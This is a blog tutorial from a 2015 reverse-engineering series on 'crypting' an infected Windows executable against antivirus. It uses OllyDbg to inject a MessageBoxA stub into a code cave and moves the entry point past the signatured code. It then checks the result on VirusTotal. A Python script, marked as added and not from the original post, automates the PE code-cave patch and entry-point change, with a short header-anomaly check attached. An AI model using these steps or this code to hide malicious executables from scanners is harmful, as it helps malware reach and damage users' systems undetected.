By ro0ted | April 6, 2015 - 01:57 | Posted in /b/ | 7 Comments
#ro0ted #OpNewblood What the blackhats don't want you to know: ASM Injecting pt 3: Crypt against AVs

In the last tutorial I showed you how to inject code into any program, specifically to make a message box open. In this one we go over how to "crypt" your .exe with OllyDbg so that the anti-virus engines currently flagging it stop matching. To be precise about the term, nothing here gets encrypted: what follows is a code-cave patch that moves where execution starts, which is what this series loosely calls crypting. – https://twitter.com/ro0ted/

So here's the infected file:

[screenshot]

Here's what we know about the file:

[screenshot]

Now we load it in OllyDbg. Before doing this, make sure it is a file you compiled yourself. I'm using something I built for this tutorial; one-time use only.

[screenshot]

As in the last tutorial, find a code cave (a run of unused null bytes inside an executable section, typically the alignment padding at the end of .text) and highlight it:

[screenshot]

Highlight the bytes you want to use, right-click and modify the bytes:

[screenshot]

Enter any string you like; the point is to create a CHAR, a null-terminated string sitting at a known address that the message box will use as its caption and text:

[screenshot]

[screenshot]

Now, right under it, click Assemble, since we need to recreate the message box call. This is the format (addresses are hex, as OllyDbg shows them; 1008751 is the address in this sample, use the one your CHAR landed at):

PUSH 0            ; uType     = MB_OK; buttons AND icon both live in this flag word
PUSH 1008751      ; lpCaption = address of the CHAR we just wrote
PUSH 1008751      ; lpText    = same address, so caption and message match
PUSH 0            ; hWnd      = NULL, no owner window (this is NOT the icon)
CALL MessageBoxA  ; stdcall: arguments were pushed right to left, so the API pops them in order

You may recognise this from the last tutorial. The difference is that this time we change the origin, the address where execution first starts, to our new code instead of the old call, which is the part the AV signature matches:

[screenshot]

On the next line enter PUSH followed by the address where your CHAR is located:

[screenshot]

The next line is the same; then PUSH 0, then CALL MessageBoxA:

[screenshot]

Now single-click the new stub (start it at the first PUSH 0, so all four arguments are on the stack when the CALL runs), right-click and select New origin here. Inside the debugger this moves EIP to our code, so the old, detected call is never reached. One caveat: New origin here only changes EIP for this debugging session and is not written to disk along with the patched bytes. For the saved file to start in the cave, AddressOfEntryPoint in the PE optional header has to be repointed at it as well (any PE or hex editor can do that), or the old call has to be overwritten with a JMP to the cave. Neither step corrupts the file as long as the cave lies inside a mapped, executable section:

[screenshot]

Now right-click and go to Copy to executable > All modifications:

[screenshot]

In the window that opens, right-click again and choose Save file:

[screenshot]

Save it under whatever name you want:

[screenshot]
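The whole procedure above, done outside the debugger, as an added example that is not from the original post: a Python script that parses the PE headers, locates a zero-byte cave in an executable section, writes the CHAR and a MessageBoxA-style stub into it, and repoints AddressOfEntryPoint so the saved file really does start at the stub (which New origin here alone does not do). It also runs the header check a scanner applies afterwards. The PE is constructed inline and is not a real binary; `api_va` is a placeholder for the address of the MessageBoxA thunk a real binary would have, and the stub jumps back to the original entry point so the program still runs.

```python
"""Code-cave patch of a PE, an added example (not the post's own code): find a
zero-byte cave in an executable section, write a CHAR plus a MessageBoxA-style
stub into it, repoint AddressOfEntryPoint at the stub, then run the header
check a scanner applies afterwards. The sample PE below is constructed."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000

def _headers(pe):
    """Return (optional_header_offset, image_base, sections) for PE32 or PE32+."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, opt_size = struct.unpack_from("<H", pe, e_lfanew + 6)[0], struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]           # 0x20B = PE32+: 64-bit ImageBase, no BaseOfData
    image_base = struct.unpack_from("<Q", pe, opt + 24)[0] if magic == 0x20B else struct.unpack_from("<I", pe, opt + 28)[0]
    sections = []
    for i in range(nsec):
        s = opt + opt_size + 40 * i                         # section headers follow the optional header
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, s)
        sections.append(dict(name=name.rstrip(b"\0").decode(), vsize=vsize, va=va, rawsize=rawsize,
                             rawptr=rawptr, chars=struct.unpack_from("<I", pe, s + 36)[0]))
    return opt, image_base, sections

def entry_point_rva(pe):
    """AddressOfEntryPoint is 16 bytes into the optional header in both formats."""
    return struct.unpack_from("<I", pe, _headers(pe)[0] + 16)[0]

def find_code_caves(pe, min_len=32):
    """(file_offset, rva, va, length) of every run of >= min_len zero bytes in an executable
    section's raw data. Zeros past VirtualSize are file-alignment slack: mapped, never executed."""
    _, image_base, sections = _headers(pe)
    caves = []
    for s in (s for s in sections if s["chars"] & IMAGE_SCN_MEM_EXECUTE):
        data = pe[s["rawptr"]:s["rawptr"] + s["rawsize"]]
        i = 0
        while i < len(data):
            j = i
            while j < len(data) and data[j] == 0:
                j += 1
            if j - i >= min_len:
                caves.append((s["rawptr"] + i, s["va"] + i, image_base + s["va"] + i, j - i))
            i = j if j > i else i + 1
    return caves

def messagebox_stub(stub_va, text_va, api_va, resume_va):
    """x86 stdcall call site for MessageBoxA(NULL, text, text, MB_OK), then a JMP back to the
    original entry point. Arguments go right to left, so the last PUSH 0 is hWnd, not an icon."""
    def push(imm):
        return b"\x68" + struct.pack("<I", imm)
    code = b"\x6A\x00" + push(text_va) + push(text_va) + b"\x6A\x00"           # uType, lpCaption, lpText, hWnd
    code += b"\xE8" + struct.pack("<i", api_va - (stub_va + len(code) + 5))     # CALL rel32 (relative to next insn)
    code += b"\xE9" + struct.pack("<i", resume_va - (stub_va + len(code) + 5))  # JMP rel32
    return code

def inject(pe, caption, api_va, min_len=32):
    """Write CHAR + stub into the first cave that fits and repoint the entry point at the stub.
    Returns (patched_pe, new_entry_rva)."""
    opt, image_base, _ = _headers(pe)
    text = caption.encode() + b"\0"
    resume_va = image_base + entry_point_rva(pe)
    for off, rva, va, length in find_code_caves(pe, min_len):
        stub = messagebox_stub(va + len(text), va, api_va, resume_va)
        if len(text) + len(stub) <= length:
            out = bytearray(pe)
            out[off:off + len(text) + len(stub)] = text + stub
            struct.pack_into("<I", out, opt + 16, rva + len(text))   # AddressOfEntryPoint -> stub
            return bytes(out), rva + len(text)
    raise ValueError("no executable cave large enough")

def entry_point_anomalies(pe):
    """Header check a scanner applies after such a patch: entry point outside every section,
    in a non-executable one, or in a section's alignment slack."""
    _, _, sections = _headers(pe)
    ep = entry_point_rva(pe)
    for s in sections:
        if s["va"] <= ep < s["va"] + max(s["vsize"], s["rawsize"]):
            findings = []
            if ep >= s["va"] + s["vsize"]:
                findings.append(f"entry point {ep:#x} lies in the slack of {s['name']}")
            if not s["chars"] & IMAGE_SCN_MEM_EXECUTE:
                findings.append(f"entry point {ep:#x} in non-executable section {s['name']}")
            return findings
    return [f"entry point {ep:#x} is outside every section"]

def build_sample_pe():
    """Constructed PE32 (not a real binary): one .text section with 0x40 bytes of dummy code,
    then 0x1C0 zero bytes of slack up to the 0x200 file alignment."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)                        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)           # i386, 1 section, PE32 opt hdr
    opt = bytearray(0xE0)                                                     # Magic .. FileAlignment:
    struct.pack_into("<HBBIIIIIIIII", opt, 0, 0x10B, 14, 0, 0x40, 0, 0, 0x1000, 0x1000, 0x2000,
                     0x400000, 0x1000, 0x200)                                 # EP 0x1000, ImageBase 0x400000
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x40, 0x1000, 0x200, 0x200, 0, 0, 0, 0,
                      0x60000020)                                             # CNT_CODE|MEM_EXECUTE|MEM_READ
    code = bytes(range(1, 0x41))                                              # dummy program bytes, none zero
    return dos + b"PE\0\0" + coff + bytes(opt) + sec + bytes(0xA0) + code + bytes(0x1C0)
```

Call `build_sample_pe()`, then `inject(pe, "ro0ted", api_va=0x401020)`: the CHAR lands at file offset 0x240 (RVA 0x1040), the stub right behind it, and the entry point moves from 0x1000 to 0x1047. Two practitioner points fall out of it. The direct CALL rel32 the stub uses encodes where user32.dll happened to be loaded during the debugging session, so it breaks once the DLL is relocated; an indirect CALL through the binary's own IAT slot is the robust form. And `entry_point_anomalies(patched)` reports the entry point sitting in the alignment slack of .text, which is exactly the kind of header oddity that makes a fresh sample suspicious before any byte signature exists for it.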

Now we rescan the .exe on VirusTotal, since the malwr.com report said VT detected the original. The usual advice is not to upload to VT at all, because every sample is shared with the vendors; that matters less here, since we can add several CHARs and caves to one .exe and re-patch if a signature catches up. This is just one CHAR:

[screenshot]

0 detections on VirusTotal at the time of the scan. Bear in mind that a clean VT result only says that no engine's static signature matched that day; it is not proof that the file is undetectable.

 Scanned the next day:

9

ro0ted

(In order)

Why am I teaching Reverse Engineering to inexperienced new Anons in OpNewblood?

Whitehat Lab

ASM Programming

Introduction Part 1 Ollydbg 

Introduction Part 2 Using Ollydbg and Tracing Botnets

Analyzing Botnets

 Introduction Part 3 Ollydbg: Cheating a Crackme

Introduction Part 4 Ollydbg: Your first Patch

Encryption 101

Cuckoo Sandbox: Automated Malware Analysis also known as Malwr.com

Introduction to Honeydrive: A Brief Walk Through

Installing Kippo the SSH Honeypot on a VPS Part 1: How to set it up

Resource Hacker

Dll Injection the Easy Way

Visual Basic Binaries Walk Through Part 1

Ollydbg on Steroids

Creating Patchers Part 1

Have you supported the gas mask campaign over the years?

Crack to win a gas mask gift pack

How to edit a register me crack me Pre Part 1

Unwinding Delphi Binaries Walk Through if not Preview

Cracking Delphi Part 2

Reversing Timed Trials: Ollydbg Tricks Part 3

Analyzing Adware

Preview Against Debugging

Bypassing Registering 101

Bypassing Part 2

Android/iOS Reversing

Introducing IDA Pro: Static Analyzing

Hacker’s Disassembler

Ripping Apart Adware

Never trust Warez or Cracked Programs: Reversing a Crypted IRC bot infected file

IDA PRO Book

Unpacking & Crypting there is a difference

Covert Debugging whitepaper from blackhat.com

Manually Unpacking with Ollydbg

Manually Unpacking Part 2

Manually Unpacking 101

ASM Injecting

ASM Injecting Part 2

ASM Injecting Part 3: Crypt your malicious file +

